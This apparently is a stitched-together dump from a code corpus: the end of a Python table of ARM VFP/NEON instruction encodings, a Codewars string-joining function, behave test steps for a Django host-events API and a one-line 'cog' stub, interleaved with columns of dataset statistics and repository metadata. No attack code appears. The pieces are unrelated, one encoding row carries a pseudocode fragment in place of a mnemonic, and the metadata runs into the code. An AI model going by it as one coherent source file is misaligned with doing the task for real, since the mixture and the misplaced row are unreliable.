('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, op, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, op, 0, N, 0, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('V<op><c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 0, F, N, 1, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 1, 0, N, 1, M, 0, Vm),
('VMOV<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, op, 1, imm4),
('VMOV<c>.F64 <Dd>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, imm4H, Vd, 1, 0, 1, sz, (0), 0, (0), 0, imm4L),
('VMOV<c> <Qd>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 0, Vm, Vd, 0, 0, 0, 1, M, Q, M, 1, Vm),
('VMOV<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VMOV<c>.<size> <Dd[x]>,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 0, opc1, 0, Vd, Rt, 1, 0, 1, 1, D, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c>.<dt> <Rt>,<Dn[x]>', 1, 1, 1, 0, 1, 1, 1, 0, U, opc1, 1, Vn, Rt, 1, 0, 1, 1, N, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c> <Sn>,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, op, Vn, Rt, 1, 0, 1, 0, N, (0), (0), 1, (0), (0), (0), (0)),
('VMOV<c> <Sm>,<Sm1>,<Rt>,<Rt2>', 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOV<c> <Dm>,<Rt>,<Rt2>', 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 1, 0, 0, M, 1, Vm),
('VMOVL<c>.<dt> <Qd>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm3, 0, 0, 0, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOVN<c>.<dt> <Dd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, 0, 0, M, 0, Vm),
('VMRS<c> <Rt>,FPSCR', 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMSR<c> FPSCR,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMUL<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, op, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 1, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, op, 0, N, 0, M, 0, Vm),
('VMUL<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('VMUL<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VMUL<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 0, F, N, 1, M, 0, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 1, 0, N, 1, M, 0, Vm),
('VMVN<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VMVN<c> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 1, Q, M, 0, Vm),
('VNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 1, Q, M, 0, Vm),
('VNEG<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VNMLA<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('UInt(Vd:D);', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VORN<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VORR<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 0, 1, imm4),
('VORR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VPADAL<c>.<dt>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 0, op, Q, M, 0, Vm),
('VPADD<c>.<dt>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 1, Vm),
('VPADD<c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VPADDL<c>.<dt>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 1, 0, op, Q, M, 0, Vm),
('VP<op><c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 0, N, Q, M, op, Vm),
('VP<op><c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('VPOP <list>', 1, 1, 1, 0, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPOP <list>', 1, 1, 1, 0, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VPUSH<c> <list>', 1, 1, 1, 0, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPUSH<c> <list>', 1, 1, 1, 0, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VQABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 0, Q, M, 0, Vm),
('VQADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 0, 0, N, Q, M, 1, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, op, 1, N, 0, M, 0, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 1, 1, N, 1, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 0, N, 1, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 0, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 1, 1, N, 1, M, 0, Vm),
('VQMOV{U}N<c>.<type><size> <Dd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, op2, M, 0, Vm),
('VQNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 1, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 1, M, 0, Vm),
('VQRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 1, Vm),
('VQRSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, op, 0, 1, M, 1, Vm),
('VQSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 1, Vm),
('VQSHL{U}<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 1, op, L, Q, M, 1, Vm),
('VQSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, op, 0, 0, M, 1, Vm),
('VQSUB<c>.<type><size> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 1, 0, N, Q, M, 1, Vm),
('VRADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VRECPE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 0, Q, M, 0, Vm),
('VRECPS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VREV<n><c>.<size> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 0, op2, Q, M, 0, Vm),
('VRHADD<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 0, 1, N, Q, M, 0, Vm),
('VRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 0, Vm),
('VRSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 1, 0, L, Q, M, 1, Vm),
('VRSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 1, M, 1, Vm),
('VRSQRTE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 1, Q, M, 0, Vm),
('VRSQRTS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VRSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 1, 1, L, Q, M, 1, Vm),
('VRSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSHL<c>.I<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 0, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 1, 0, 0, M, 0, Vm),
('VSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 0, 0, L, Q, M, 1, Vm),
('VSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 0, M, 1, Vm),
('VSLI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSQRT<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 0, 1, L, Q, M, 1, Vm),
('VSRI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 0, L, Q, M, 1, Vm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VST3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VSTM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSTR<c> <Dd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTR<c> <Sd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSUB<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VSUB<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VSUB<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSUBL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 0, 1, op, N, 0, M, 0, Vm),
('VSWP<c> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 0, Q, M, 0, Vm),
('V<op><c>.8 <Dd>,<list>,<Dm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, Vn, Vd, 1, 0, len_, N, op, M, 0, Vm),
('VTRN<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 1, Q, M, 0, Vm),
('VTST<c>.<size> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
('VUZP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 1, 0, Q, M, 0, Vm),
('VZIP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 1, 1, Q, M, 0, Vm),
]
if __name__ == '__main__':
    # Self-check: every encoding row must describe exactly 32 bits.
    # Each row is (mnemonic, field0, field1, ...); a literal int contributes
    # one bit, while a field object contributes its declared .bitsize.
    for description in (VFP_ARMv7 + VFP_Thumb):
        instr = description[0]
        # isinstance is the idiomatic type check (also accepts int subclasses).
        bits = [1 if isinstance(x, int) else x.bitsize for x in description[1:]]
        total = sum(bits)  # hoisted: the original computed sum(bits) twice
        if total != 32:
            print(instr, bits, total)
| 101.136709
| 132
| 0.395329
| 9,867
| 39,949
| 1.595014
| 0.022094
| 0.230271
| 0.201868
| 0.140552
| 0.940653
| 0.940399
| 0.939637
| 0.938366
| 0.937603
| 0.937095
| 0
| 0.18615
| 0.252472
| 39,949
| 394
| 133
| 101.393401
| 0.340857
| 0
| 0
| 0
| 0
| 0
| 0.248166
| 0.041002
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007792
| 0
| 0.007792
| 0.002597
| 0
| 0
| 1
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
1d168df70c241bffc650db1634940f97996ff8f9
| 151
|
py
|
Python
|
8kyu/grasshopper_combine_strings.py
|
nhsz/codewars
|
82703959e910254d6feff4162f78c6dbd7a1c3ed
|
[
"MIT"
] | 1
|
2018-12-02T23:04:38.000Z
|
2018-12-02T23:04:38.000Z
|
8kyu/grasshopper_combine_strings.py
|
nhsz/codewars
|
82703959e910254d6feff4162f78c6dbd7a1c3ed
|
[
"MIT"
] | null | null | null |
8kyu/grasshopper_combine_strings.py
|
nhsz/codewars
|
82703959e910254d6feff4162f78c6dbd7a1c3ed
|
[
"MIT"
] | null | null | null |
# http://www.codewars.com/kata/55f73f66d160f1f1db000059/
def combine_names(first_name, last_name):
    """Return the full name: first and last name joined by one space."""
    return f"{first_name} {last_name}"
| 30.2
| 56
| 0.754967
| 21
| 151
| 5.190476
| 0.761905
| 0.165138
| 0.238532
| 0.311927
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138686
| 0.092715
| 151
| 4
| 57
| 37.75
| 0.656934
| 0.357616
| 0
| 0
| 0
| 0
| 0.073684
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1d4dd929550bf7b4692d9cb7d58e97e19856e8bd
| 3,618
|
py
|
Python
|
behave_tests/steps/get_events.py
|
Sindhuja-SRL/back-end
|
d84dae8ed212913339dec646b46a67fcc0b77f52
|
[
"MIT"
] | null | null | null |
behave_tests/steps/get_events.py
|
Sindhuja-SRL/back-end
|
d84dae8ed212913339dec646b46a67fcc0b77f52
|
[
"MIT"
] | null | null | null |
behave_tests/steps/get_events.py
|
Sindhuja-SRL/back-end
|
d84dae8ed212913339dec646b46a67fcc0b77f52
|
[
"MIT"
] | 1
|
2022-03-11T01:45:39.000Z
|
2022-03-11T01:45:39.000Z
|
from behave import *
import requests
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
use_step_matcher("re")
@given("that I am a registered host of privilege walk events and exists events on my username")
def step_impl(context):
    """Arrange: create a registered user and one event owned by them.

    Stores credentials and the auth token on ``context`` so the following
    @when/@then steps can issue authenticated requests.
    """
    context.username = "12thMan"
    context.password = "SomePassword123"
    context.first_name = "12th"
    context.last_name = "Man"
    context.email = "twelve@testtamu.edu"
    usr = User.objects.create_user(
        context.username,
        context.email,
        context.password
    )
    usr.first_name = context.first_name
    usr.last_name = context.last_name
    usr.save()
    # Sanity check: exactly one user with this username now exists.
    registered_user = User.objects.filter(username="12thMan")
    assert len(registered_user) == 1
    user_auth_token, _ = Token.objects.get_or_create(user=usr)
    context.key = user_auth_token.key
    data = {
        "name": "New year event",
        "x_label_min": "Some text to be displayed on the graph",
        "x_label_max": "Something else you want to be displayed on the graph",
    }
    headers = {
        'Authorization':'Token '+ context.key
    }
    # Create one event so the "list events" query has something to return.
    resp = requests.post(context.test.live_server_url + "/host/events/create/", data, headers=headers)
@when("I make an API call to the get events API with my correct username")
def step_impl(context):
    """Act: fetch all events for the authenticated host and stash the JSON."""
    headers = {
        'Authorization':'Token '+ context.key
    }
    resp = requests.get(context.test.live_server_url + "/host/events/all/", headers=headers)
    # Any 2xx status counts as success.
    assert resp.status_code >= 200 and resp.status_code < 300
    context.api_response_data = resp.json()
@then("I expect the response that gives the list of events on my username as host")
def step_impl(context):
    """Assert: the event created in the @given step is returned first."""
    assert context.api_response_data["events"][0]["name"] == "New year event"
@given("that I am a registered host of privilege walk events and there exists no events on my username")
def step_impl(context):
    """Arrange: create a registered user with an auth token but no events."""
    context.username = "12thMan"
    context.password = "SomePassword123"
    context.first_name = "12th"
    context.last_name = "Man"
    context.email = "twelve@testtamu.edu"
    usr = User.objects.create_user(
        context.username,
        context.email,
        context.password
    )
    usr.first_name = context.first_name
    usr.last_name = context.last_name
    usr.save()
    # Sanity check: exactly one user with this username now exists.
    registered_user = User.objects.filter(username="12thMan")
    assert len(registered_user) == 1
    user_auth_token, _ = Token.objects.get_or_create(user=usr)
    context.key = user_auth_token.key
@when("I make an API call to the get events API with my username")
def step_impl(context):
    """Act: fetch all events for the authenticated host and stash the JSON."""
    headers = {
        'Authorization':'Token '+ context.key
    }
    resp = requests.get(context.test.live_server_url + "/host/events/all/", headers=headers)
    # Any 2xx status counts as success.
    assert resp.status_code >= 200 and resp.status_code < 300
    context.api_response_data = resp.json()
@then("I expect the response that gives the empty list as response")
def step_impl(context):
    """Assert: the host has no events, so the list is empty."""
    assert context.api_response_data["events"] == []
@given("that I am a registered host of privilege walk events and forgot my username")
def step_impl(context):
    """Arrange: nothing to set up — the @when step sends no credentials."""
    pass
@when("I make an API call to the get events API with wrong username")
def step_impl(context):
    """Act: call the events endpoint without an Authorization header."""
    resp = requests.get(context.test.live_server_url + "/host/events/all/")
    # No credentials supplied, so a 4xx client error is expected.
    assert resp.status_code >= 400 and resp.status_code < 500
    context.api_response_data = resp.json()
@then("I expect the response that says username doesn't exists")
def step_impl(context):
    """Assert: the API returns its standard missing-credentials message."""
    assert context.api_response_data["detail"] == "Authentication credentials were not provided."
| 29.900826
| 104
| 0.701216
| 508
| 3,618
| 4.848425
| 0.242126
| 0.025579
| 0.040195
| 0.065773
| 0.821356
| 0.8108
| 0.780755
| 0.747868
| 0.747868
| 0.729192
| 0
| 0.013356
| 0.192924
| 3,618
| 121
| 105
| 29.900826
| 0.830137
| 0
| 0
| 0.635294
| 0
| 0
| 0.297043
| 0
| 0
| 0
| 0
| 0
| 0.094118
| 1
| 0.105882
| false
| 0.058824
| 0.047059
| 0
| 0.152941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1d576f6588eb1d2aae7c778d0ad217e3ca9a9ecd
| 35
|
py
|
Python
|
cog/__init__.py
|
uniphil/cog
|
deae32a3b06ee379fa44f68477ecfc00a2fc723d
|
[
"MIT"
] | 158
|
2018-07-09T02:46:54.000Z
|
2022-03-06T15:56:49.000Z
|
cog/__init__.py
|
uniphil/cog
|
deae32a3b06ee379fa44f68477ecfc00a2fc723d
|
[
"MIT"
] | 18
|
2018-07-12T14:59:01.000Z
|
2022-01-02T04:57:20.000Z
|
cog/__init__.py
|
uniphil/cog
|
deae32a3b06ee379fa44f68477ecfc00a2fc723d
|
[
"MIT"
] | 22
|
2019-01-31T14:57:39.000Z
|
2022-03-16T07:25:53.000Z
|
def cog():
    """Report that cog is importable and running."""
    message = "Cog is alive."
    return message
| 11.666667
| 23
| 0.628571
| 6
| 35
| 3.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 35
| 2
| 24
| 17.5
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0.371429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d5539201acc74777191577d0a77d4057f6de4e8d
| 153
|
py
|
Python
|
graphgallery/utils/ipynb.py
|
EdisonLeeeee/GraphGallery
|
4eec9c5136bda14809bd22584b26cc346cdb633b
|
[
"MIT"
] | 300
|
2020-08-09T04:27:41.000Z
|
